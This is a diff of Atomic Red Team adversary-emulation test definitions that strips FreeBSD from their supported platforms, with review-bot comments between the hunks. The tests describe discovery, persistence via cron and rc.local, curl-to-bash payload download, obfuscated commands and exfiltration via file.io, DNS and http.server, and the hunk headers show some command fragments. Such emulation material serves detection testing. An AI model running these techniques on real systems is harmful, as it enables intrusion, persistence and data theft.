@@ -87,7 +87,6 @@ atomic_tests:

Upon successful execution, sh will execute arp to list out the arp cache. Output will be via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh
@@ -109,7 +108,6 @@ atomic_tests:

Upon successful execution, sh will perform a ping sweep on the 192.168.1.1/24 and echo via stdout if an IP is active.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -277,7 +275,7 @@ atomic_tests:
description: |
Use the netstat command to display the kernels routing tables.
supported_platforms:
- freebsd
- linux
executor:
command: |
netstat -r | grep default

@@ -18,7 +18,7 @@ Uses dd to add a zero byte, high-quality random data, and low-quality random dat

Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** ffe2346c-abd5-4b45-a713-bf5f1ebd573a
@@ -71,7 +71,7 @@ Uses truncate to add a byte to the binary to change the hash.

Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** e22a9e89-69c7-410f-a473-e6c212cd2292

@@ -8,9 +8,8 @@ atomic_tests:

Upon successful execution, dd will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded
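Review bot: in this hunk `- macos` appears as both a removed and an added line; with the `-8,9 +8,8` counts that means `macos` is being moved below `linux` in the same change that deletes `- freebsd`. The reorder is unrelated churn that makes the platform removal harder to verify; keep the existing order and drop only `- freebsd` (the `truncate` hunk that follows has the same pattern).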
@@ -40,9 +39,8 @@ atomic_tests:

Upon successful execution, truncate will modify `/tmp/evil-binary`, therefore the expected hash will change.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
file_to_pad:
description: Path of binary to be padded

@@ -122,7 +122,7 @@ Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atom
## Atomic Test #3 - C compile
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** d0377aa6-850a-42b2-95f0-de558d80be57
@@ -168,7 +168,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
## Atomic Test #4 - CC compile
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** da97bb11-d6d0-4fc1-b445-e443d1346efe
@@ -214,7 +214,7 @@ wget https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004
## Atomic Test #5 - Go compile
Compile a go file with golang on FreeBSD, Linux or Macos.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 78bd3fa7-773c-449e-a978-dc1f1500bc52

@@ -64,7 +64,6 @@ atomic_tests:
description: |
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
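Review bot: the description `Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.` is left untouched while `- freebsd` is removed from `supported_platforms`, so the text advertises a platform the test no longer claims. Update the description to match the platform list (the same applies to the CC and Go compile hunks below and to their markdown headings, which also keep the FreeBSD wording).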
@@ -90,7 +89,6 @@ atomic_tests:
description: |
Compile a c file with either gcc or clang on FreeBSD, Linux or Macos.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:
@@ -116,7 +114,6 @@ atomic_tests:
description: |
Compile a go file with golang on FreeBSD, Linux or Macos.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:

@@ -96,7 +96,7 @@ Creates a base64-encoded data file and decodes it into an executable shell scrip
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team`
and uname -v

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 197ed693-08e6-4958-bfd8-5974e291be6c

@@ -41,7 +41,7 @@ atomic_tests:
Upon successful execution, sh will execute art.sh, which is a base64 encoded command, that echoes `Hello from the Atomic Red Team`
and uname -v
supported_platforms:
- freebsd
- linux
input_arguments:
shell_command:
description: command to encode

@@ -12,7 +12,7 @@
## Atomic Test #1 - Data Transfer Size Limits
Take a file/directory, split it into 5Mb chunks

**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux


**auto_generated_guid:** ab936c51-10f4-46ce-9144-e02137b2016a

@@ -8,7 +8,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
file_name:
description: File name

@@ -71,7 +71,7 @@ Identify System owner or users on an endpoint

Upon successful execution, sh will stdout list of usernames.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c

@@ -33,7 +33,6 @@ atomic_tests:

Upon successful execution, sh will stdout list of usernames.
supported_platforms:
- freebsd
- linux
- macos
executor:

@@ -65,7 +65,7 @@ Copies sh process, renames it as crond, and executes it to masquerade as the cro

Upon successful execution, sh is renamed to `crond` and executed.

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** a315bfff-7a98-403b-b442-2ea1b255e556

@@ -23,7 +23,6 @@ atomic_tests:

Upon successful execution, sh is renamed to `crond` and executed.
supported_platforms:
- freebsd
- linux
executor:
command: |

@@ -16,7 +16,7 @@ Adversaries may also use the same icon of the file they are trying to mimic.</bl
## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.
Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`)

**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux


**auto_generated_guid:** 812c3ab8-94b0-4698-a9bf-9420af23ce24

@@ -8,7 +8,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
test_message:
description: Test message to echo out to the screen

@@ -85,7 +85,7 @@ rm -rf /tmp/atomic-test-T1036.006
## Atomic Test #3 - Space After Filename (FreeBSD)
Space after filename.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** cfc1fbb5-caae-4f4c-bfa8-1b7c8b5cc4e8

@@ -38,7 +38,7 @@ atomic_tests:
description: |
Space after filename.
supported_platforms:
- freebsd
- linux
executor:
name: sh
command: |
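Review bot: the markdown heading still reads `Space After Filename (FreeBSD)` while `supported_platforms` in the YAML hunk becomes `- linux` only. A test named for FreeBSD that lists only Linux is misleading and, given the `rm -rf /tmp/atomic-test-T1036.006` cleanup in the hunk header from the preceding test, likely duplicates the existing Linux variant; either retain `- freebsd` or remove the test and its heading instead of relabelling it.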
@@ -126,7 +126,7 @@ origfilename='/etc/rc.local.original';if [ ! -f $origfilename ];then sudo rm /et
## Atomic Test #4 - rc.local (FreeBSD)
Modify rc.local

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 2015fb48-8ab6-4fbf-928b-0b62de5c9476

@@ -59,7 +59,7 @@ atomic_tests:
Modify rc.local

supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: true
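Review bot: `rc.local (FreeBSD)` keeps its FreeBSD name while `- freebsd` is swapped for `- linux`; the hunk header context (`origfilename='/etc/rc.local.original' ... sudo rm /et`) shows the preceding test in this file already modifies and restores `/etc/rc.local`, so relabelling this one as Linux produces a second rc.local test for the same platform. Keep the FreeBSD entry or delete the test.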
@@ -98,7 +98,7 @@ Perform a PCAP. Wireshark will be required for tshark. TCPdump may already be in

Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** c93f2492-9ebe-44b5-8b45-36574cccfe67
@@ -463,7 +463,7 @@ cc #{csource_path} -o #{program_path}
## Atomic Test #10 - Packet Capture FreeBSD using /dev/bpfN with sudo
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** e2028771-1bfb-48f5-b5e6-e50ee0942a14
@@ -514,7 +514,7 @@ cc #{csource_path} -o #{program_path}
## Atomic Test #11 - Filtered Packet Capture FreeBSD using /dev/bpfN with sudo
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** a3a0d4c9-c068-4563-a08d-583bd05b884c

@@ -35,7 +35,7 @@ atomic_tests:

Upon successful execution, tshark or tcpdump will execute and capture 5 packets on interface ens33.
supported_platforms:
- freebsd
- linux
input_arguments:
interface:
description: Specify interface to perform PCAP on.
@@ -254,7 +254,7 @@ atomic_tests:
description: |
Opens a /dev/bpf file (O_RDONLY) and captures packets for a few seconds.
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.
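Review bot: this test `Opens a /dev/bpf file (O_RDONLY)` and is titled `Packet Capture FreeBSD using /dev/bpfN with sudo`, yet `- freebsd` is replaced by `- linux`. `/dev/bpf*` device nodes are a BSD feature; Linux has no such nodes (its packet capture goes through AF_PACKET sockets), so the test cannot succeed on the only platform it now lists. The same holds for the filtered `/dev/bpfN` test in the next hunk; keep `- freebsd` for both or remove them.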
@@ -288,7 +288,7 @@ atomic_tests:
description: |
Opens a /dev/bpf file (O_RDONLY), sets BPF filter for 'udp' and captures packets for a few seconds.
supported_platforms:
- freebsd
- linux
input_arguments:
ifname:
description: Specify interface to perform PCAP on.

@@ -142,7 +142,7 @@ Scan ports to check for listening ports with Nmap.

Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** f03d59dc-0e3b-428a-baeb-3499552c7048

@@ -69,13 +69,13 @@ atomic_tests:
name: sh
elevation_required: true
- name: Port Scan Nmap for FreeBSD
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048
description: |
Scan ports to check for listening ports with Nmap.

Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of addresses on port 80 to determine if listening. Results will be via stdout.
supported_platforms:
- freebsd
- linux
input_arguments:
host:
description: Host to scan.
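Review bot: `auto_generated_guid: f03d59dc-0e3b-428a-baeb-3499552c7048` appears as both a removed and an added line with identical content, so that part of the hunk is a whitespace-only change and should be reverted to keep the diff minimal. Separately, the entry is still named `Port Scan Nmap for FreeBSD` while `- freebsd` becomes `- linux`; rename it or keep the FreeBSD platform.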
@@ -77,7 +77,7 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Exfiltrate data HTTPS using curl freebsd,linux or macos
Exfiltrate data HTTPS using curl to file share site file.io

**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux


**auto_generated_guid:** 4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01

@@ -46,7 +46,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
input_file:
description: Test file to upload

@@ -32,7 +32,7 @@ A firewall rule (ipfw,pf,iptables or firewalld) will be needed to allow exfiltra

Upon successful execution, sh will be used to make a directory (/tmp/victim-staging-area), write a txt file, and host the directory with Python on port 1337, to be later downloaded.

**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux


**auto_generated_guid:** 1d1abbd6-a3d3-4b2e-bef5-c59293f46eff
@@ -104,7 +104,7 @@ $ping = New-Object System.Net.Networkinformation.ping; foreach($Data in Get-Cont
## Atomic Test #3 - Exfiltration Over Alternative Protocol - DNS
Exfiltration of specified file over DNS protocol.

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** c403b5a4-b5fc-49f2-b181-d1c80d27db45
@@ -358,7 +358,7 @@ if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sle
## Atomic Test #9 - Python3 http.server (freebsd)
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 57a303a2-0bc6-400d-b144-4f3292920a0b

@@ -10,7 +10,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
executor:
steps: |
1. Victim System Configuration:
@@ -53,7 +52,6 @@ atomic_tests:
description: |
Exfiltration of specified file over DNS protocol.
supported_platforms:
- freebsd
- linux
executor:
steps: |
@@ -223,7 +221,7 @@ atomic_tests:
description: |
An adversary may use the python3 standard library module http.server to exfiltrate data. This test checks if python3.9 is available and if so, creates a HTTP server on port 9090, captures the PID, sleeps for 10 seconds, then kills the PID and unsets the $PID variable.
supported_platforms:
- freebsd
- linux
executor:
name: sh
elevation_required: false
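Review bot: `Python3 http.server (freebsd)` keeps its FreeBSD name and a description that checks for `python3.9`, while the header context of its markdown hunk (`if [ $(which python3) ]; then cd /tmp; python3 -m http.server 9090 & PID=$!; sle`) shows the existing Linux http.server test in the same file; changing `- freebsd` to `- linux` therefore leaves two near-identical Linux tests on port 9090. Keep this one FreeBSD-only or delete it.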
@@ -26,7 +26,7 @@ Remote to Local

Upon successful execution, sh will spawn ssh contacting a remote domain (default: target.example.com) writing a tar.gz file.

**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux


**auto_generated_guid:** f6786cc8-beda-4915-a4d6-ac2f193bb988
@@ -63,7 +63,7 @@ Local to Remote

Upon successful execution, tar will compress /Users/* directory and password protect the file modification of `Users.tar.gz.enc` as output.

**Supported Platforms:** macOS, Linux, Freebsd
**Supported Platforms:** macOS, Linux


**auto_generated_guid:** 7c3cb337-35ae-4d06-bf03-3032ed2ec268

@@ -12,7 +12,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
domain:
description: target SSH domain
@@ -33,7 +32,6 @@ atomic_tests:
supported_platforms:
- macos
- linux
- freebsd
input_arguments:
user_name:
description: username for domain

@@ -86,7 +86,7 @@ Get a listing of network connections.

Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 9ae28d3f-190f-4fa0-b023-c7bd3e0eabf2

@@ -34,7 +34,6 @@ atomic_tests:

Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
supported_platforms:
- freebsd
- linux
- macos
dependency_executor_name: sh

@@ -108,7 +108,7 @@ echo 'Please start the `atd` daemon (sysv: `service atd start` ; systemd: `syste
## Atomic Test #3 - At - Schedule a job freebsd
This test submits a command to be run in the future by the `at` daemon.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 549863fb-1c91-467e-97fc-1fa32b9f356b

@@ -60,7 +60,7 @@ atomic_tests:
This test submits a command to be run in the future by the `at` daemon.

supported_platforms:
- freebsd
- linux

input_arguments:
time_spec:
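Review bot: `At - Schedule a job freebsd` becomes a Linux-only test, but the markdown hunk's header context (the `Please start the atd daemon (sysv: service atd start ; systemd: ...` message) comes from the Linux `at` test already present in this file, so the result is a duplicate Linux test carrying a FreeBSD name. Keep `- freebsd` for this entry or remove it outright.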
@@ -20,7 +20,7 @@ An adversary may use <code>cron</code> in Linux or Unix environments to execute
## Atomic Test #1 - Cron - Replace crontab with referenced file
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.

**Supported Platforms:** Freebsd, macOS, Linux
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 435057fb-74b1-410e-9403-d81baf194f75
@@ -103,7 +103,7 @@ rm /etc/cron.weekly/#{cron_script_name}
## Atomic Test #3 - Cron - Add script to /etc/cron.d folder
This test adds a script to /etc/cron.d folder configured to execute on a schedule.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 078e69eb-d9fb-450e-b9d0-2e118217c846

@@ -6,9 +6,8 @@ atomic_tests:
description: |
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
supported_platforms:
- freebsd
- macos
- linux
- macos
input_arguments:
command:
description: Command to execute
@@ -59,7 +58,7 @@ atomic_tests:
description: |
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
supported_platforms:
- freebsd
- linux
input_arguments:
command:
description: Command to execute

@@ -194,7 +194,7 @@ There are several variables that can be set to control the appearance of the bas

To gain persistence the command could be added to the users .shrc or .profile

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** b04284dc-3bd9-4840-8d21-61b8d31c99f2
@@ -243,7 +243,7 @@ When a command is executed in bash, the BASH_COMMAND variable contains that comm

To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** 7f85a946-a0ea-48aa-b6ac-8ff539278258

@@ -95,7 +95,7 @@ atomic_tests:

To gain persistence the command could be added to the users .shrc or .profile
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:
- description: |
@@ -121,7 +121,6 @@ atomic_tests:

To gain persistence the command could be added to the users .bashrc or .bash_aliases or the systems default .bashrc in /etc/skel/
supported_platforms:
- freebsd
- linux
dependency_executor_name: sh
dependencies:

@@ -28,7 +28,7 @@ Utilize ps to identify processes.

Upon successful execution, sh will execute ps and output to /tmp/loot.txt.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 4ff64f0b-aaf2-4866-b39d-38d9791407cc

@@ -8,7 +8,6 @@ atomic_tests:

Upon successful execution, sh will execute ps and output to /tmp/loot.txt.
supported_platforms:
- freebsd
- linux
- macos
input_arguments:

@@ -48,7 +48,7 @@ Adversaries may abuse Unix shells to execute various commands or payloads. Inter
## Atomic Test #1 - Create and Execute Bash Shell Script
Creates and executes a simple sh script.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 7e7ac3ed-f795-4fa5-b711-09d6fbe9b873
@@ -90,7 +90,7 @@ Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is gen

Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.

**Supported Platforms:** Freebsd, Linux, macOS
**Supported Platforms:** Linux, macOS


**auto_generated_guid:** d0c88567-803d-4dca-99b4-7ce65e7b257c
@@ -225,7 +225,7 @@ curl --create-dirs #{linenum_url} --output #{linenum}
## Atomic Test #5 - New script file in the tmp directory
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** 8cd1947b-4a54-41fb-b5ea-07d0ace04f81
@@ -260,7 +260,7 @@ unset TMPFILE
## Atomic Test #6 - What shell is running
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** 7b38e5cc-47be-44f0-a425-390305c76c17
@@ -290,7 +290,7 @@ if $(printenv SHELL >/dev/null); then printenv SHELL; fi
## Atomic Test #7 - What shells are available
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** bf23c7dc-1004-4949-8262-4c1d1ef87702
@@ -318,7 +318,7 @@ cat /etc/shells
## Atomic Test #8 - Command line scripts
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** b04ed73c-7d43-4dc8-b563-a2fc595cba1a
@@ -377,7 +377,7 @@ unset ART
## Atomic Test #10 - Obfuscated command line scripts (freebsd)
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.

**Supported Platforms:** Freebsd
**Supported Platforms:** Linux


**auto_generated_guid:** 5dc1d9dd-f396-4420-b985-32b1c4f79062
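Review bot: `Obfuscated command line scripts (freebsd)` changes only its platform line: the heading keeps the `(freebsd)` suffix while `Supported Platforms` becomes `Linux`. The same pattern recurs for the other `(freebsd)`-suffixed tests in this file (`Change login shell`, `Environment variable scripts`, `Detecting pipe-to-shell` in the hunks below). If these are meant to survive as Linux tests, drop the suffix and confirm they do not duplicate the existing Linux variants; otherwise keep `- freebsd` in their `supported_platforms`.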
@@ -455,7 +455,7 @@ echo "Automated installer not implemented yet, please install chsh manually"
|
||||
## Atomic Test #12 - Change login shell (freebsd)
|
||||
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 33b68b9b-4988-4caf-9600-31b7bf04227c
|
||||
@@ -535,7 +535,7 @@ unset ART
|
||||
## Atomic Test #14 - Environment variable scripts (freebsd)
|
||||
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 663b205d-2121-48a3-a6f9-8c9d4d87dfee
|
||||
@@ -622,7 +622,7 @@ apt update && apt install -y curl
|
||||
## Atomic Test #16 - Detecting pipe-to-shell (freebsd)
|
||||
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
|
||||
|
||||
**Supported Platforms:** Freebsd
|
||||
**Supported Platforms:** Linux
|
||||
|
||||
|
||||
**auto_generated_guid:** 1a06b1ec-0cca-49db-a222-3ebb6ef25632
|
||||
|
||||
@@ -6,7 +6,6 @@ atomic_tests:
|
||||
description: |
|
||||
Creates and executes a simple sh script.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
input_arguments:
|
||||
@@ -30,7 +29,6 @@ atomic_tests:
|
||||
|
||||
Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
- macos
|
||||
executor:
|
||||
@@ -105,7 +103,6 @@ atomic_tests:
|
||||
description: |
|
||||
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which results in the id command being executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -122,7 +119,6 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -136,7 +132,6 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -148,7 +143,6 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
@@ -173,7 +167,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to bash, which results in the id command being executed.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -210,7 +204,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/sh shell, changes the users shell to sh, then deletes the art user.
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
dependencies:
|
||||
- description: |
|
||||
chsh - change login shell, must be installed
|
||||
@@ -247,7 +241,7 @@ atomic_tests:
|
||||
description: |
|
||||
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/sh
|
||||
supported_platforms:
|
||||
- freebsd
|
||||
- linux
|
||||
executor:
|
||||
name: sh
|
||||
elevation_required: false
|
||||
@@ -293,7 +287,7 @@ atomic_tests:
description: |
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage of this BLIND install method and selectively running extra commands in the install script for those who DO pipe to bash and not for those who DO NOT. This test uses curl to download the pipe-to-shell.sh script, the first time without piping it to bash and the second piping it into bash which executes the echo command.
supported_platforms:
- freebsd
- linux
input_arguments:
remote_url:
description: url of remote payload

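Review bot: the description needs an editing pass before it ships: "pipe line" should be "pipeline", "Of-course" should be "Of course", "selectively running" should be "selectively run", and the all-caps BLIND / DO / DO NOT should be plain text. The point it makes is worth keeping in one sentence: a `curl | bash` install gives the user no chance to read what runs, which is why the first, non-piped fetch in this test is the useful control for a detection engineer comparing the two executions. `description: url of remote payload` should also say what the default points at, since the test executes whatever it downloads.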
@@ -20,7 +20,7 @@ Python comes with many built-in packages to interact with the underlying system,
## Atomic Test #1 - Execute shell script via python's command mode arguement
Download and execute shell script and write to file then execute locally using Python -c (command mode)

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
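Review bot: the heading in the context line spells "arguement"; the technique README is generated from the YAML, so fix the test's `name:` in the YAML rather than the markdown, or the next regeneration reintroduces it. The only change in this hunk is dropping Freebsd from the platform line, which must stay in step with the `- freebsd` removal in the YAML hunk for the same GUID (`@@ -5,7 +5,6 @@`), otherwise the generated README drifts from its source.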
@@ -74,7 +74,7 @@ pip install requests
## Atomic Test #2 - Execute Python via scripts
Create Python file (.py) that downloads and executes shell script via executor arguments

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
@@ -139,7 +139,7 @@ pip install requests
## Atomic Test #3 - Execute Python via Python executables
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** 0b44d79b-570a-4b27-a31f-3bf2156e5eaa
@@ -206,7 +206,7 @@ pip install requests
## Atomic Test #4 - Python pty module and spawn function used to spawn sh or bash
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence

**Supported Platforms:** Freebsd, Linux
**Supported Platforms:** Linux


**auto_generated_guid:** 161d694c-b543-4434-85c3-c3a433e33792

@@ -5,7 +5,6 @@ atomic_tests:
auto_generated_guid: 3a95cdb2-c6ea-4761-b24e-02b71889b8bb
description: Download and execute shell script and write to file then execute locally using Python -c (command mode)
supported_platforms:
- freebsd
- linux
input_arguments:
script_url:
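Review bot: the header (-5,7 +5,6) shows a net loss of one line, so this hunk removes `- freebsd` rather than adding it; the rendered page stripped the +/- markers, and that header is the only way left to read the direction. If dropping FreeBSD is intended, say so in the commit message, because a merge titled "Merge branch 'master' into master" that silently reverts a platform port across every test in this file is exactly the kind of change reviewers miss.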
@@ -43,7 +42,6 @@ atomic_tests:
auto_generated_guid: 6c4d1dcb-33c7-4c36-a8df-c6cfd0408be8
description: Create Python file (.py) that downloads and executes shell script via executor arguments
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -97,7 +95,6 @@ atomic_tests:
description: |
Create Python file (.py) then compile to binary (.pyc) that downloads an external malicious script then executes locally using the supplied executor and arguments
supported_platforms:
- freebsd
- linux
input_arguments:
python_script_name:
@@ -156,9 +153,8 @@ atomic_tests:
description: |
Uses the Python spawn function to spawn a sh shell followed by a bash shell. Per Volexity, this technique was observed in exploitation of Atlassian Confluence [CVE-2022-26134]. Reference: https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence
supported_platforms:
- freebsd
- linux
dependencies:
dependencies:
- description: |
Verify if python is in the environment variable path and attempt to import requests library.
prereq_command: |

